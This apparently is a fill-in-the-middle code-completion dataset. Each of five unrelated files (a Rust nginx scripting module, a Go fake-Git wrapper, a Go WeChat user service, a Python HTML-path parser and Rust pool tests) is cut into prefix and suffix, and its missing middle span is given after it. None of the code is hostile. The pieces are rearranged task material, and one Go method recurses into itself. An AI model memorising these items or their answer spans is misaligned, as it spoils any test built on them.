type Future = FutureResult<Self::Transform, Self::InitError>;
fn new_transform(&self, service: S) -> Self::Future {
ok(Apply::new(service, self.f.clone()))
}
}
impl<F, S, In, Out, Err> IntoTransform<FnTransform<F, S, In, Out, Err>, S> for F
where
S: Service,
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
Out::Error: From<S::Error>,
{
fn | (self) -> FnTransform<F, S, In, Out, Err> {
FnTransform::new(self)
}
}
impl<F, S, In, Out, Err> Clone for FnTransform<F, S, In, Out, Err>
where
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
{
fn clone(&self) -> Self {
Self::new(self.f.clone())
}
}
| into_transform |
nginx_module.rs | use crate::{
nginx_utils::*,
ngx_string,
script::{EvalContext, ScriptEngine},
};
use nginx::*;
use rhai::{Dynamic, ImmutableString};
use std::{
borrow::Borrow,
collections::HashMap,
os::raw::{c_char, c_void},
ptr,
};
pub const NGX_RS_MODULE_SIGNATURE: &'static [u8; 41usize] =
b"8,4,8,0000111111010111001110101111000110\0";
#[no_mangle]
static mut commands: [ngx_command_t; 2] = [
ngx_command_t {
name: ngx_string!("open_rusty_request_filter\0"),
type_: (NGX_HTTP_LOC_CONF | NGX_CONF_TAKE1) as ngx_uint_t,
set: Some(ngx_open_rusty_request_filter_set),
conf: 16,
offset: 0,
post: std::ptr::null_mut(),
},
ngx_command_t {
name: ngx_str_t {
len: 0,
data: std::ptr::null_mut(),
},
type_: 0,
set: None,
conf: 0,
offset: 0,
post: std::ptr::null_mut(),
},
];
#[no_mangle]
static ngx_open_rusty_mod_ctx: ngx_http_module_t = ngx_http_module_t {
postconfiguration: None,
preconfiguration: None,
create_loc_conf: Some(create_loc_conf),
merge_loc_conf: Some(merge_loc_conf),
merge_srv_conf: None,
init_main_conf: None,
create_main_conf: None,
create_srv_conf: None,
};
struct LocConf {
script_engine: Option<ScriptEngine>,
}
unsafe extern "C" fn create_loc_conf(cf: *mut ngx_conf_t) -> *mut c_void {
let mut pool = Pool::from_ngx_pool((*cf).pool);
pool.allocate::<LocConf>(LocConf {
script_engine: None,
}) as *mut c_void
}
unsafe extern "C" fn merge_loc_conf(
_cf: *mut ngx_conf_t,
_prev: *mut c_void,
_conf: *mut c_void,
) -> *mut c_char {
// TODO: support merge
// let prev = &mut *(prev as *mut LocConf);
// let conf = &mut *(conf as *mut LocConf);
// if conf.script_engine.is_none() {
// conf.script_engine = prev.script_engine;
// }
ptr::null_mut()
}
#[no_mangle]
pub static mut ngx_open_rusty_mod: ngx_module_t = ngx_module_t {
ctx_index: ngx_uint_t::max_value(),
index: ngx_uint_t::max_value(),
name: std::ptr::null_mut(),
version: nginx_version as ngx_uint_t,
signature: NGX_RS_MODULE_SIGNATURE.as_ptr() as *const c_char,
ctx: &ngx_open_rusty_mod_ctx as *const _ as *mut _,
commands: unsafe { &commands[0] as *const _ as *mut _ },
type_: NGX_HTTP_MODULE as ngx_uint_t,
init_master: None,
init_module: None,
init_process: None,
init_thread: None,
exit_thread: None,
exit_process: None,
exit_master: None,
spare0: 0,
spare1: 0,
spare_hook0: 0,
spare_hook1: 0,
spare_hook2: 0,
spare_hook3: 0,
spare_hook4: 0,
spare_hook5: 0,
spare_hook6: 0,
spare_hook7: 0,
};
pub unsafe fn ngx_http_conf_get_module_loc_conf(
cf: *mut ngx_conf_t,
module: &ngx_module_t,
) -> *mut c_void {
let http_conf_ctx = (*cf).ctx as *mut ngx_http_conf_ctx_t;
*(*http_conf_ctx).loc_conf.add(module.ctx_index)
}
#[no_mangle]
unsafe extern "C" fn ngx_open_rusty_request_filter_set(
cf: *mut ngx_conf_t,
_cmd: *mut ngx_command_t,
conf: *mut c_void,
) -> *mut c_char |
pub fn get_module_loc_conf(r: *mut ngx_http_request_t, module: &ngx_module_t) -> *mut c_void {
unsafe { *(*r).loc_conf.add(module.ctx_index) }
}
#[no_mangle]
unsafe extern "C" fn open_rusty_request_filter_handler(r: *mut ngx_http_request_t) -> ngx_int_t {
let hlcf = get_module_loc_conf(r, &ngx_open_rusty_mod) as *mut LocConf;
let engine = (*hlcf).borrow();
let engine = *&engine.script_engine.as_ref().unwrap();
let mut headers: HashMap<ImmutableString, Dynamic> = HashMap::new();
for header in (*r).headers_in.into_iter() {
headers.insert(header.key().into(), header.value().into());
}
let ctx = EvalContext { headers };
let script_result = engine.run(&ctx);
match script_result {
Some(x) => x as isize,
_ => NGX_DECLINED as isize,
}
}
| {
let conf = &mut *(conf as *mut LocConf);
let args = (*(*cf).args).elts as *mut ngx_str_t;
let value = NgxStr::from_ngx_str(*args.add(1));
let script = String::from(value.to_string_lossy());
conf.script_engine = Some(ScriptEngine::new(&script));
let clcf = ngx_http_conf_get_module_loc_conf(cf, &ngx_http_core_module)
as *mut ngx_http_core_loc_conf_t;
(*clcf).handler = Some(open_rusty_request_filter_handler);
ptr::null_mut()
} |
git_local.go | package gits
import (
"io"
"time"
"github.com/jenkins-x/jx/pkg/auth"
gitcfg "gopkg.in/src-d/go-git.v4/config"
)
// GitLocal provides a semi-fake Gitter - local operations delegate to GitCLI but remote operations are delegated to
// FakeGit. When using it in tests you must make sure you are operating on a temporary copy of a git repo NOT the
// real one on your disk (as it will get changed!).
// Faked out methods have the comment "Faked out"
type GitLocal struct {
GitCLI *GitCLI
GitFake *GitFake
}
// NewGitLocal creates a new GitLocal instance
func NewGitLocal() *GitLocal |
// FindGitConfigDir tries to find the `.git` directory either in the current directory or in parent directories
// Faked out
func (g *GitLocal) FindGitConfigDir(dir string) (string, string, error) {
return g.GitCLI.FindGitConfigDir(dir)
}
func (g *GitLocal) Config(dir string, args ...string) error {
return g.GitCLI.Config(dir, args...)
}
// Clone clones the given git URL into the given directory
// Faked out
func (g *GitLocal) Clone(url string, dir string) error {
return g.GitFake.Clone(url, dir)
}
// ShallowCloneBranch clones a single branch of the given git URL into the given directory
// Faked out
func (g *GitLocal) ShallowCloneBranch(url string, branch string, dir string) error {
return g.GitFake.ShallowCloneBranch(url, branch, dir)
}
// ShallowClone shallow clones the repo at url from the specified commitish or pull request to a local master branch
// Faked out
func (g *GitLocal) ShallowClone(dir string, url string, commitish string, pullRequest string) error {
return g.GitFake.ShallowClone(dir, url, commitish, pullRequest)
}
// Pull pulls the Git repository in the given directory
// Faked out
func (g *GitLocal) Pull(dir string) error {
return g.GitFake.Pull(dir)
}
// PullRemoteBranches pulls the remote Git tags from the given given directory
// Faked out
func (g *GitLocal) PullRemoteBranches(dir string) error {
return g.GitFake.PullRemoteBranches(dir)
}
// DeleteRemoteBranch deletes the remote branch in the given given directory
// Faked out
func (g *GitLocal) DeleteRemoteBranch(dir string, remoteName string, branch string) error {
return g.GitFake.DeleteRemoteBranch(dir, remoteName, branch)
}
// DeleteLocalBranch deletes a remote branch
func (g *GitLocal) DeleteLocalBranch(dir string, branch string) error {
return g.GitFake.DeleteLocalBranch(dir, branch)
}
// CloneOrPull clones the given git URL or pull if it already exists
// Faked out
func (g *GitLocal) CloneOrPull(url string, dir string) error {
return g.GitFake.CloneOrPull(url, dir)
}
// PullUpstream pulls the remote upstream branch into master branch into the given directory
// Faked out
func (g *GitLocal) PullUpstream(dir string) error {
return g.GitFake.PullUpstream(dir)
}
// ResetToUpstream resets the given branch to the upstream version
func (g *GitLocal) ResetToUpstream(dir string, branch string) error {
return g.GitFake.ResetToUpstream(dir, branch)
}
// AddRemote adds a remote repository at the given URL and with the given name
func (g *GitLocal) AddRemote(dir string, name string, url string) error {
return g.GitCLI.AddRemote(dir, name, url)
}
// UpdateRemote updates the URL of the remote repository
func (g *GitLocal) UpdateRemote(dir, url string) error {
return g.GitCLI.UpdateRemote(dir, url)
}
// StashPush stashes the current changes from the given directory
func (g *GitLocal) StashPush(dir string) error {
return g.GitCLI.StashPush(dir)
}
// CheckoutRemoteBranch checks out the given remote tracking branch
func (g *GitLocal) CheckoutRemoteBranch(dir string, branch string) error {
return g.GitCLI.CheckoutRemoteBranch(dir, branch)
}
// RemoteBranches returns the remote branches
func (g *GitLocal) RemoteBranches(dir string) ([]string, error) {
return g.GitCLI.RemoteBranches(dir)
}
// Checkout checks out the given branch
func (g *GitLocal) Checkout(dir string, branch string) error {
return g.GitCLI.Checkout(dir, branch)
}
// CheckoutCommitFiles checks out the given files
func (g *GitLocal) CheckoutCommitFiles(dir string, commit string, files []string) error {
return g.GitCLI.CheckoutCommitFiles(dir, commit, files)
}
// CheckoutOrphan checks out the given branch as an orphan
func (g *GitLocal) CheckoutOrphan(dir string, branch string) error {
return g.GitCLI.CheckoutOrphan(dir, branch)
}
// Init inits a git repository into the given directory
func (g *GitLocal) Init(dir string) error {
return g.GitCLI.Init(dir)
}
// Remove removes the given file from a Git repository located at the given directory
func (g *GitLocal) Remove(dir, fileName string) error {
return g.GitCLI.Remove(dir, fileName)
}
// RemoveForce removes the given file from a git repository located at the given directory
func (g *GitLocal) RemoveForce(dir, fileName string) error {
return g.GitCLI.RemoveForce(dir, fileName)
}
// CleanForce cleans a git repository located at a given directory
func (g *GitLocal) CleanForce(dir, fileName string) error {
return g.CleanForce(dir, fileName)
}
// Status returns the status of the git repository at the given directory
func (g *GitLocal) Status(dir string) error {
return g.GitCLI.Status(dir)
}
// Branch returns the current branch of the repository located at the given directory
func (g *GitLocal) Branch(dir string) (string, error) {
return g.GitCLI.Branch(dir)
}
// Push pushes the changes from the repository at the given directory
// Faked out
func (g *GitLocal) Push(dir string, remote string, force bool, refspec ...string) error {
return g.GitFake.Push(dir, "origin", false)
}
// ForcePushBranch does a force push of the local branch into the remote branch of the repository at the given directory
// Faked out
func (g *GitLocal) ForcePushBranch(dir string, localBranch string, remoteBranch string) error {
return g.GitFake.ForcePushBranch(dir, localBranch, remoteBranch)
}
// PushMaster pushes the master branch into the origin
// Faked out
func (g *GitLocal) PushMaster(dir string) error {
return g.GitFake.PushMaster(dir)
}
// PushTag pushes the given tag into the origin
// Faked out
func (g *GitLocal) PushTag(dir string, tag string) error {
return g.GitFake.PushTag(dir, tag)
}
// Add does a git add for all the given arguments
func (g *GitLocal) Add(dir string, args ...string) error {
return g.GitCLI.Add(dir, args...)
}
// HasChanges indicates if there are any changes in the repository from the given directory
func (g *GitLocal) HasChanges(dir string) (bool, error) {
return g.GitCLI.HasChanges(dir)
}
// HasFileChanged returns true if file has changes in git
func (g *GitLocal) HasFileChanged(dir string, fileName string) (bool, error) {
return g.GitCLI.HasFileChanged(dir, fileName)
}
// CommitIfChanges does a commit if there are any changes in the repository at the given directory
func (g *GitLocal) CommitIfChanges(dir string, message string) error {
return g.GitCLI.CommitIfChanges(dir, message)
}
// CommitDir commits all changes from the given directory
func (g *GitLocal) CommitDir(dir string, message string) error {
return g.GitCLI.CommitDir(dir, message)
}
// AddCommit perform an add and commit of the changes from the repository at the given directory with the given messages
func (g *GitLocal) AddCommit(dir string, msg string) error {
return g.GitCLI.AddCommit(dir, msg)
}
// CreateAuthenticatedURL creates the Git repository URL with the username and password encoded for HTTPS based URLs
func (g *GitLocal) CreateAuthenticatedURL(cloneURL string, userAuth *auth.UserAuth) (string, error) {
return g.GitCLI.CreateAuthenticatedURL(cloneURL, userAuth)
}
// AddCommitFiles add files to a commit
func (g *GitLocal) AddCommitFiles(dir string, msg string, files []string) error {
return g.GitCLI.AddCommitFiles(dir, msg, files)
}
// RepoName formats the repository names based on the organization
func (g *GitLocal) RepoName(org, repoName string) string {
return g.GitCLI.RepoName(org, repoName)
}
// Server returns the Git server of the repository at the given directory
func (g *GitLocal) Server(dir string) (string, error) {
return g.GitCLI.Server(dir)
}
// Info returns the git info of the repository at the given directory
func (g *GitLocal) Info(dir string) (*GitRepository, error) {
return g.GitCLI.Info(dir)
}
// ConvertToValidBranchName converts the given branch name into a valid git branch string
// replacing any dodgy characters
func (g *GitLocal) ConvertToValidBranchName(name string) string {
return g.GitCLI.ConvertToValidBranchName(name)
}
// FetchBranch fetches a branch
// Faked out
func (g *GitLocal) FetchBranch(dir string, repo string, refspec ...string) error {
return g.GitFake.FetchBranch(dir, repo, refspec...)
}
// FetchBranchShallow fetches a branch
// Faked out
func (g *GitLocal) FetchBranchShallow(dir string, repo string, refspec ...string) error {
return g.GitFake.FetchBranchShallow(dir, repo, refspec...)
}
// FetchBranchUnshallow fetches a branch
// Faked out
func (g *GitLocal) FetchBranchUnshallow(dir string, repo string, refspec ...string) error {
return g.GitFake.FetchBranch(dir, repo, refspec...)
}
// GetAuthorEmailForCommit returns the author email from commit message with the given SHA
func (g *GitLocal) GetAuthorEmailForCommit(dir string, sha string) (string, error) {
return g.GitCLI.GetAuthorEmailForCommit(dir, sha)
}
// SetRemoteURL sets the remote URL of the remote with the given name
func (g *GitLocal) SetRemoteURL(dir string, name string, gitURL string) error {
return g.GitCLI.SetRemoteURL(dir, name, gitURL)
}
// DiscoverRemoteGitURL discovers the remote git URL from the given git configuration
func (g *GitLocal) DiscoverRemoteGitURL(gitConf string) (string, error) {
return g.GitCLI.DiscoverRemoteGitURL(gitConf)
}
// DiscoverUpstreamGitURL discovers the upstream git URL from the given git configuration
func (g *GitLocal) DiscoverUpstreamGitURL(gitConf string) (string, error) {
return g.GitCLI.DiscoverUpstreamGitURL(gitConf)
}
// GetRemoteUrl returns the remote URL from the given git config
func (g *GitLocal) GetRemoteUrl(config *gitcfg.Config, name string) string {
return g.GitCLI.GetRemoteUrl(config, name)
}
// RemoteBranchNames returns all remote branch names with the given prefix
func (g *GitLocal) RemoteBranchNames(dir string, prefix string) ([]string, error) {
return g.GitCLI.RemoteBranchNames(dir, prefix)
}
// RemoteMergedBranchNames returns all remote branch names with the given prefix
func (g *GitLocal) RemoteMergedBranchNames(dir string, prefix string) ([]string, error) {
return g.GitCLI.RemoteMergedBranchNames(dir, prefix)
}
// GetCommitPointedToByPreviousTag returns the previous git tag from the repository at the given directory
func (g *GitLocal) GetCommitPointedToByPreviousTag(dir string) (string, string, error) {
return g.GitCLI.GetCommitPointedToByPreviousTag(dir)
}
// GetRevisionBeforeDate returns the revision before the given date
func (g *GitLocal) GetRevisionBeforeDate(dir string, t time.Time) (string, error) {
return g.GitCLI.GetRevisionBeforeDate(dir, t)
}
// GetRevisionBeforeDateText returns the revision before the given date in format "MonthName dayNumber year"
func (g *GitLocal) GetRevisionBeforeDateText(dir string, dateText string) (string, error) {
return g.GitCLI.GetRevisionBeforeDateText(dir, dateText)
}
// GetCommitPointedToByLatestTag return the SHA of the current git tag from the repository at the given directory
func (g *GitLocal) GetCommitPointedToByLatestTag(dir string) (string, string, error) {
return g.GitCLI.GetCommitPointedToByLatestTag(dir)
}
// GetCommitPointedToByTag return the SHA of the commit pointed to by the given git tag
func (g *GitLocal) GetCommitPointedToByTag(dir string, tag string) (string, error) {
return g.GitCLI.GetCommitPointedToByTag(dir, tag)
}
// GetLatestCommitMessage returns the latest git commit message
func (g *GitLocal) GetLatestCommitMessage(dir string) (string, error) {
return g.GitCLI.GetLatestCommitMessage(dir)
}
// FetchTags fetches all the tags
// Faked out
func (g *GitLocal) FetchTags(dir string) error {
return g.GitFake.FetchTags(dir)
}
// FetchRemoteTags fetches all the tags from a remote repository
// Faked out
func (g *GitLocal) FetchRemoteTags(dir string, repo string) error {
return g.GitFake.FetchRemoteTags(dir, repo)
}
// Tags returns all tags from the repository at the given directory
func (g *GitLocal) Tags(dir string) ([]string, error) {
return g.GitCLI.Tags(dir)
}
// FilterTags returns all tags from the repository at the given directory that match the filter
func (g *GitLocal) FilterTags(dir string, filter string) ([]string, error) {
return g.GitCLI.FilterTags(dir, filter)
}
// CreateTag creates a tag with the given name and message in the repository at the given directory
func (g *GitLocal) CreateTag(dir string, tag string, msg string) error {
return g.GitCLI.CreateTag(dir, tag, msg)
}
// PrintCreateRepositoryGenerateAccessToken prints the access token URL of a Git repository
func (g *GitLocal) PrintCreateRepositoryGenerateAccessToken(server *auth.AuthServer, username string, o io.Writer) {
g.GitCLI.PrintCreateRepositoryGenerateAccessToken(server, username, o)
}
// IsFork indicates if the repository at the given directory is a fork
func (g *GitLocal) IsFork(dir string) (bool, error) {
return g.GitCLI.IsFork(dir)
}
// Version returns the git version
func (g *GitLocal) Version() (string, error) {
return g.GitCLI.Version()
}
// Username return the username from the git configuration
// Faked out
func (g *GitLocal) Username(dir string) (string, error) {
// Use GitFake as this is a global setting
return g.GitFake.Username(dir)
}
// SetUsername sets the username in the git configuration
// Faked out
func (g *GitLocal) SetUsername(dir string, username string) error {
// Use GitFake as this is a global setting
return g.GitFake.SetUsername(dir, username)
}
// Email returns the email from the git configuration
// Faked out
func (g *GitLocal) Email(dir string) (string, error) {
// Use GitFake as this is a global setting
return g.GitFake.Email(dir)
}
// SetEmail sets the given email in the git configuration
// Faked out
func (g *GitLocal) SetEmail(dir string, email string) error {
// Use GitFake as this is a global setting
return g.GitFake.SetEmail(dir, email)
}
// CreateBranch creates a branch with the given name in the Git repository from the given directory
func (g *GitLocal) CreateBranch(dir string, branch string) error {
return g.GitCLI.CreateBranch(dir, branch)
}
// Diff runs git diff
func (g *GitLocal) Diff(dir string) (string, error) {
return g.GitCLI.Diff(dir)
}
// ListChangedFilesFromBranch lists files changed between branches
func (g *GitLocal) ListChangedFilesFromBranch(dir string, branch string) (string, error) {
return g.GitCLI.ListChangedFilesFromBranch(dir, branch)
}
// LoadFileFromBranch returns a files's contents from a branch
func (g *GitLocal) LoadFileFromBranch(dir string, branch string, file string) (string, error) {
return g.GitCLI.LoadFileFromBranch(dir, branch, file)
}
// FetchUnshallow does nothing
// Faked out
func (g *GitLocal) FetchUnshallow(dir string) error {
return g.GitFake.FetchUnshallow(dir)
}
// IsShallow runs git rev-parse --is-shalllow-repository in dir
func (g *GitLocal) IsShallow(dir string) (bool, error) {
return g.GitCLI.IsShallow(dir)
}
// CreateBranchFrom creates a new branch called branchName from startPoint
func (g *GitLocal) CreateBranchFrom(dir string, branchName string, startPoint string) error {
return g.GitCLI.CreateBranchFrom(dir, branchName, startPoint)
}
// Merge merges the commitish into the current branch
func (g *GitLocal) Merge(dir string, commitish string) error {
return g.GitCLI.Merge(dir, commitish)
}
// GetLatestCommitSha returns the sha of the last commit
func (g *GitLocal) GetLatestCommitSha(dir string) (string, error) {
return g.GitCLI.GetLatestCommitSha(dir)
}
// GetFirstCommitSha gets the first commit sha
func (g *GitLocal) GetFirstCommitSha(dir string) (string, error) {
return g.GitCLI.GetFirstCommitSha(dir)
}
// Reset performs a git reset --hard back to the commitish specified
func (g *GitLocal) Reset(dir string, commitish string, hard bool) error {
return g.GitCLI.Reset(dir, commitish, true)
}
// RemoteUpdate performs a git remote update
// Faked out
func (g *GitLocal) RemoteUpdate(dir string) error {
return g.GitFake.RemoteUpdate(dir)
}
// LocalBranches will list all local branches
func (g *GitLocal) LocalBranches(dir string) ([]string, error) {
return g.GitCLI.LocalBranches(dir)
}
// MergeTheirs performs a cherry pick of commitish
func (g *GitLocal) MergeTheirs(dir string, commitish string) error {
return g.GitCLI.MergeTheirs(dir, commitish)
}
// RebaseTheirs runs git rebase upstream branch
func (g *GitLocal) RebaseTheirs(dir string, upstream string, branch string, skipEmpty bool) error {
return g.GitCLI.RebaseTheirs(dir, upstream, branch, false)
}
// GetCommits returns the commits in a range, exclusive of startSha and inclusive of endSha
func (g *GitLocal) GetCommits(dir string, startSha string, endSha string) ([]GitCommit, error) {
return g.GitCLI.GetCommits(dir, startSha, endSha)
}
// RevParse runs git rev parse
func (g *GitLocal) RevParse(dir string, rev string) (string, error) {
return g.GitCLI.RevParse(dir, rev)
}
// SetUpstreamTo will set the given branch to track the origin branch with the same name
func (g *GitLocal) SetUpstreamTo(dir string, branch string) error {
return g.GitCLI.SetUpstreamTo(dir, branch)
}
// Remotes will list the names of the remotes
func (g *GitLocal) Remotes(dir string) ([]string, error) {
return g.GitCLI.Remotes(dir)
}
// StashPop runs git stash pop
func (g *GitLocal) StashPop(dir string) error {
return g.GitCLI.StashPop(dir)
}
// CloneBare does nothing
func (g *GitLocal) CloneBare(dir string, url string) error {
return nil
}
// PushMirror does nothing
func (g *GitLocal) PushMirror(dir string, url string) error {
return nil
}
// GetCommitsNotOnAnyRemote returns a list of commits which are on branch but not present on a remote
func (g *GitLocal) GetCommitsNotOnAnyRemote(dir string, branch string) ([]GitCommit, error) {
return g.GitCLI.GetCommitsNotOnAnyRemote(dir, branch)
}
// CherryPick does a git cherry-pick of commit
func (g *GitLocal) CherryPick(dir string, commit string) error {
return g.GitCLI.CherryPick(dir, commit)
}
// CherryPickTheirs does a git cherry-pick of commit
func (g *GitLocal) CherryPickTheirs(dir string, commit string) error {
return g.GitCLI.CherryPickTheirs(dir, commit)
}
// CherryPickTheirsKeepRedundantCommits does a git cherry-pick of commit
func (g *GitLocal) CherryPickTheirsKeepRedundantCommits(dir string, commit string) error {
return g.GitCLI.CherryPickTheirsKeepRedundantCommits(dir, commit)
}
// Describe does a git describe of commitish, optionally adding the abbrev arg if not empty
func (g *GitLocal) Describe(dir string, contains bool, commitish string, abbrev string, fallback bool) (string, string, error) {
return g.GitCLI.Describe(dir, false, commitish, abbrev, fallback)
}
// IsAncestor checks if the possible ancestor commit-ish is an ancestor of the given commit-ish.
func (g *GitLocal) IsAncestor(dir string, possibleAncestor string, commitish string) (bool, error) {
return g.GitCLI.IsAncestor(dir, possibleAncestor, commitish)
}
// WriteRepoAttributes writes the given content to .git/info/attributes
func (g *GitLocal) WriteRepoAttributes(dir string, content string) error {
return g.GitCLI.WriteRepoAttributes(dir, content)
}
// ReadRepoAttributes reads the existing content, if any, in .git/info/attributes
func (g *GitLocal) ReadRepoAttributes(dir string) (string, error) {
return g.GitCLI.ReadRepoAttributes(dir)
}
| {
return &GitLocal{
GitCLI: NewGitCLI(),
GitFake: &GitFake{},
}
} |
ma_user.go | package ma
import (
"encoding/json"
"github.com/cliod/wx-go/common"
"github.com/cliod/wx-go/common/util"
)
type WxMaUserService interface {
// jsCode换取openid
GetSessionInfo(jsCode string) (*JsCode2SessionResult, error)
// 解密用户敏感数据
GetUserInfo(sessionKey, encryptedData, ivStr string) (*UserInfo, error)
// 解密用户手机号信息.
GetPhoneNoInfo(sessionKey, encryptedData, ivStr string) (*PhoneNumberInfo, error)
// 验证用户信息完整性
CheckUserInfo(sessionKey, rawData, signature string) bool
/* 上报用户数据后台接口.
小游戏可以通过本接口上报key-value数据到用户的CloudStorage。
文档参考https://developers.weixin.qq.com/minigame/dev/document/open-api/data/setUserStorage.html */
SetUserStorage(kvMap map[string]string, sessionKey, openid string) error
}
type WxMaUserServiceImpl struct {
service WxMaService
}
func newWxMaUserService(service WxMaService) *WxMaUserServiceImpl {
return &WxMaUserServiceImpl{
service: service,
}
}
func (u *WxMaUserServiceImpl) GetSessionInfo(jsCode string) (*Js | ssionInfo(jsCode)
}
func (u *WxMaUserServiceImpl) GetUserInfo(sessionKey, encryptedData, ivStr string) (*UserInfo, error) {
return GetUserInfo(sessionKey, encryptedData, ivStr)
}
func (u *WxMaUserServiceImpl) GetPhoneNoInfo(sessionKey, encryptedData, ivStr string) (*PhoneNumberInfo, error) {
return GetPhoneNoInfo(sessionKey, encryptedData, ivStr)
}
func (u *WxMaUserServiceImpl) CheckUserInfo(sessionKey, rawData, signature string) bool {
return CheckUserInfo(sessionKey, rawData, signature)
}
func (u *WxMaUserServiceImpl) SetUserStorage(kvMap map[string]string, sessionKey, openid string) error {
c := u.service.GetWxMaConfig()
var param = map[string]interface{}{}
var arr []interface{}
for k, v := range kvMap {
arr = append(arr, map[string]interface{}{"key": k, "value": v})
}
param["kv_list"] = arr
b, err := json.Marshal(param)
if err != nil {
return err
}
sign := util.HmacSha256(string(b), sessionKey)
_, err = u.service.Post(common.MaSetUserStorage, common.PostJsonContentType, param, c.GetAppID(), sign, openid, "hmac_sha256")
return err
}
| Code2SessionResult, error) {
return u.service.JsCode2Se |
html_path_reader.py | from parsimonious.grammar import Grammar
from .. import html_paths
def read_html_path(string):
path_node = _grammar.parse(string)
return read_html_path_node(path_node)
def read_html_path_node(path_node):
if path_node.children[0].expr_name == "ignore":
return html_paths.ignore
elif path_node.children[0].children:
return _read_html_path_elements_node(path_node.children[0].children[0])
else:
return html_paths.empty
def _read_html_path_elements_node(path_node):
elements = [
_read_element_node(child)
for child in _repeated_children_with_separator(path_node, has_whitespace=True)
]
return html_paths.path(elements)
def _read_element_node(node):
tag_names = _read_tag_names_node(node.children[0])
class_names = _read_class_names_node(node.children[1])
fresh = _read_fresh_node(node.children[2])
return html_paths.element(tag_names, class_names=class_names, fresh=fresh)
def _read_tag_names_node(node):
return [
child.text
for child in _repeated_children_with_separator(node, has_whitespace=False)
]
def | (class_names_node):
return [
_read_class_name_node(node)
for node in class_names_node.children
]
def _read_class_name_node(node):
return node.children[1].text
def _read_fresh_node(node):
return len(node.children) > 0
def _repeated_children_with_separator(node, has_whitespace):
yield node.children[0]
if has_whitespace:
sequence_node_index = 3
else:
sequence_node_index = 1
sequence_node = node.children[1]
for child in sequence_node.children:
yield child.children[sequence_node_index]
grammar_text = r"""
html_path = ignore / html_path_elements?
ignore = "!"
html_path_elements = element (whitespace* ">" whitespace* element)*
element = tag_names class_name* fresh?
tag_names = identifier ("|" identifier)*
class_name = "." identifier
fresh = ":fresh"
identifier = ~"[A-Z0-9]+"i
whitespace = ~"\s"*
"""
_grammar = Grammar(grammar_text)
| _read_class_names_node |
test.rs | use antidote::Mutex;
use std::sync::atomic::{
AtomicBool, AtomicIsize, AtomicUsize, Ordering, ATOMIC_BOOL_INIT, ATOMIC_USIZE_INIT,
};
use std::sync::mpsc::{self, Receiver, SyncSender};
use std::time::Duration;
use std::{error, fmt, mem, thread};
use {CustomizeConnection, ManageConnection, Pool};
#[derive(Debug)]
pub struct Error;
impl fmt::Display for Error {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
fmt.write_str("blammo")
}
}
impl error::Error for Error {
fn description(&self) -> &str {
"Error"
}
}
#[derive(Debug, PartialEq)]
struct FakeConnection(bool);
struct OkManager;
impl ManageConnection for OkManager {
type Connection = FakeConnection;
type Error = Error;
fn connect(&self) -> Result<FakeConnection, Error> {
Ok(FakeConnection(true))
}
fn is_valid(&self, _: &mut FakeConnection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut FakeConnection) -> bool {
false
}
}
struct NthConnectFailManager {
n: Mutex<u32>,
}
impl ManageConnection for NthConnectFailManager {
type Connection = FakeConnection;
type Error = Error;
fn connect(&self) -> Result<FakeConnection, Error> {
let mut n = self.n.lock();
if *n > 0 {
*n -= 1;
Ok(FakeConnection(true))
} else {
Err(Error)
}
}
fn is_valid(&self, _: &mut FakeConnection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut FakeConnection) -> bool {
false
}
}
#[test]
fn test_max_size_ok() {
let manager = NthConnectFailManager { n: Mutex::new(5) };
let pool = Pool::builder().max_size(5).build(manager).unwrap();
let mut conns = vec![];
for _ in 0..5 {
conns.push(pool.get().ok().unwrap());
}
}
#[test]
fn test_acquire_release() {
let pool = Pool::builder().max_size(2).build(OkManager).unwrap();
let conn1 = pool.get().ok().unwrap();
let conn2 = pool.get().ok().unwrap();
drop(conn1);
let conn3 = pool.get().ok().unwrap();
drop(conn2);
drop(conn3);
}
#[test]
fn try_get() {
let pool = Pool::builder().max_size(2).build(OkManager).unwrap();
let conn1 = pool.try_get();
let conn2 = pool.try_get();
let conn3 = pool.try_get();
assert!(conn1.is_some());
assert!(conn2.is_some());
assert!(conn3.is_none());
drop(conn1);
assert!(pool.try_get().is_some());
}
#[test]
fn test_is_send_sync() {
fn is_send_sync<T: Send + Sync>() {}
is_send_sync::<Pool<OkManager>>();
}
#[test]
fn test_issue_2_unlocked_during_is_valid() {
struct BlockingChecker {
first: AtomicBool,
s: Mutex<SyncSender<()>>,
r: Mutex<Receiver<()>>,
}
impl ManageConnection for BlockingChecker {
type Connection = FakeConnection;
type Error = Error;
fn connect(&self) -> Result<FakeConnection, Error> {
Ok(FakeConnection(true))
}
fn is_valid(&self, _: &mut FakeConnection) -> Result<(), Error> {
if self.first.compare_and_swap(true, false, Ordering::SeqCst) {
self.s.lock().send(()).unwrap();
self.r.lock().recv().unwrap();
}
Ok(())
}
fn has_broken(&self, _: &mut FakeConnection) -> bool {
false
}
}
let (s1, r1) = mpsc::sync_channel(0);
let (s2, r2) = mpsc::sync_channel(0);
let manager = BlockingChecker {
first: AtomicBool::new(true),
s: Mutex::new(s1),
r: Mutex::new(r2),
};
let pool = Pool::builder()
.test_on_check_out(true)
.max_size(2)
.build(manager)
.unwrap();
let p2 = pool.clone();
let t = thread::spawn(move || {
p2.get().ok().unwrap();
});
r1.recv().unwrap();
// get call by other task has triggered the health check
pool.get().ok().unwrap();
s2.send(()).ok().unwrap();
t.join().ok().unwrap();
}
#[test]
fn test_drop_on_broken() {
static DROPPED: AtomicBool = ATOMIC_BOOL_INIT;
DROPPED.store(false, Ordering::SeqCst);
struct Connection;
impl Drop for Connection {
fn drop(&mut self) {
DROPPED.store(true, Ordering::SeqCst);
}
}
struct Handler;
impl ManageConnection for Handler {
type Connection = Connection;
type Error = Error;
fn connect(&self) -> Result<Connection, Error> {
Ok(Connection)
}
fn is_valid(&self, _: &mut Connection) -> Result<(), Error> {
Ok(())
}
fn has_broken(&self, _: &mut Connection) -> bool {
true
}
}
let pool = Pool::new(Handler).unwrap();
drop(pool.get().ok().unwrap());
assert!(DROPPED.load(Ordering::SeqCst));
}
#[test]
fn test_initialization_failure() {
let manager = NthConnectFailManager { n: Mutex::new(0) };
let err = Pool::builder()
.connection_timeout(Duration::from_secs(1))
.build(manager)
.err()
.unwrap();
assert!(err.to_string().contains("blammo"));
}
#[test]
fn test_lazy_initialization_failure() {
let manager = NthConnectFailManager { n: Mutex::new(0) };
